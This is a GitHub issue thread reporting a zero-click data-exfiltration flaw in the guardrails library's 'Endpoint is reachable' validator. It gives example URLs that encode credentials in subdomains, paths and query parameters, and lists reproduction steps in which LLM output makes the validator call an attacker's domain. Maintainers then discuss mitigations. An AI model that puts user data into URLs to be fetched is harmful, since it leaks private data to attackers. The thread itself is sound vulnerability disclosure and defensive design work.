guardrails icon indicating copy to clipboard operation
guardrails copied to clipboard

[bug] Endpoint is reachable Validator "Zero-click" Vulnerability

Open lihter opened this issue 11 months ago • 5 comments

Describe the bug In the validator Endpoint is reachable there's a zero-click vulnerability. When the validator checks if the endpoint is reachable, the endpoint/URL requested can be a malicious domain used to exfiltrate data through subdomains, URL paths, and query parameters.

Examples of exfiltrating data through calling malicious endpoints:

  • Query parameter example: https://www.malicious-domain.co.uk/path?firstName=John&lastName=Doe&pass=johndoe123&username=johndoe
  • Subdomain example: https://johndoe123.johndoe.malicious-domain.com/
  • Path example: https://malicious-domain.com/john/doe/johndoe123/johndoe
  • Of course, those can be combined.

To Reproduce Steps to reproduce the behavior:

  1. Attacker owns a (malicious) domain
  2. Apply endpoint is reachable validator when configuring Guardrails
  3. Add data for exfiltration to the endpoint (containing malicious domain) - done by the LLM
  4. Request the malicious endpoint which contains the data - done by the validator function
  5. Attacker has the data

Note: The request to check if the endpoint is reachable can both pass and fail, but nevertheless, if the request was made to the malicious domain (containing the data in any form), the attacker has successfully exfiltrated the data.

Expected behavior I see 2 possible solutions:

  • remove Endpoint is reachable validator
  • check only if the host is reachable (e.g. for https://www.subdomain.malicious-domain.co.uk/path?firstName=John&lastName=Doe&pass=johndoe123&username=johndoe check https://www.malicious-domain.co.uk/) [Also in that case we might need to consider renaming to host_is_reachable]
  • have a white and black list of URLs when configuring the validator

I'm open to any other suggestions. I'll propose a PR with the implementation of the 2nd proposed solution.

Library version: Version (e.g. 0.4.2)

lihter avatar Mar 21 '24 13:03 lihter

Thanks for the PR! I’m a big fan of this change in theory but I do have a few follow ups

  1. I think we lose a lot by losing the ability to hit specific paths
  2. I’m fine with losing the ability to hit urls + query params
  3. Is there a way to do this without fetching the entire endpoint? Like some tcp/http strat where we just do a reach out without requesting the full page? Like HEADing it?

zsimjee avatar Mar 23 '24 05:03 zsimjee

I also love the suggestion of having lists of url regexes that are allowed/blocked

zsimjee avatar Mar 23 '24 05:03 zsimjee

  1. I think we lose a lot by losing the ability to hit specific paths

Agree! I like the feature, but unfortunately, it introduces a vulnerability/possible misuse, so I think we should agree on some compromise solution. But, of course, it's your call.

  1. I’m fine with losing the ability to hit urls + query params

Noted 🙂

  1. Is there a way to do this without fetching the entire endpoint? Like some tcp/http strat where we just do a reach out without requesting the full page? Like HEADing it?

After thinking this through, I think checking DNS records might be useful... This way we won't ping the target server, but we'll know if the URL can be resolved to an actual IP address. I think we can use socket.getaddrinfo() for this purpose.

Please let me know what you think and if I can make the PR with said DNS records solution. Also ping me, if you have any additional questions. I'll be more than happy to make the changes to the code 🙂

lihter avatar Mar 28 '24 15:03 lihter

I like the socket.getaddrinfo() idea, but unfortunately that doesn't tell us whether an HTTP endpoint is open. I think it would be good to combine this approach with the HEAD request approach defined here - https://realpython.com/site-connectivity-checker-python/

I also want to add that we should put this functionality under a head_only param passed to the validator constructor. When that value is true (which it should be by default), the validator will only check HEAD and socket info. When it's false, it'll do the existing logic.

As far as the zero-touch vulnerability goes, we should absolutely document and mitigate it, but I think it's not possible to get rid of totally. So for this code path, I think we should do the following

  1. add a warning saying "Full requests will be made to this site" and log the site name each time
  2. include 2 params as you recommended allowed_domains and blocked_domains
  3. ensure that there isn't a tertiary concern around remote script execution - if we pull down a site with scripts in it, we want to make sure those scripts do not execute. This could be as simple as never touching the body of the req and only checking for the http status response header

zsimjee avatar Mar 29 '24 00:03 zsimjee

I understand; I'll set aside the DNS idea then. 🙂

Concerning the head_only parameter, its inclusion in the validator's constructor puzzles me. I can't envision a scenario where fetching the body is necessary to ascertain if the endpoint_is_reachable. Thus, I believe we can always opt for a requests.head(endpoint) to obtain the HTTP header, simplifying our approach.

However, even when we limit our request to just the header, the vulnerability persists, and an attacker could access the data, just as before.

Regarding the list of domains, I think choosing just one will suffice. My recommendation is to use allowed_domains, but I'd like your confirmation. Would you prefer this as an initializer parameter or a function parameter?

As for the tertiary concern about remote script execution, I wouldn't worry too much. Python's HTTP requests library is designed to be resilient against such issues.

lihter avatar Mar 29 '24 07:03 lihter

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 14 days.

github-actions[bot] avatar Aug 22 '24 03:08 github-actions[bot]

This issue was closed because it has been stalled for 14 days with no activity.

github-actions[bot] avatar Sep 05 '24 03:09 github-actions[bot]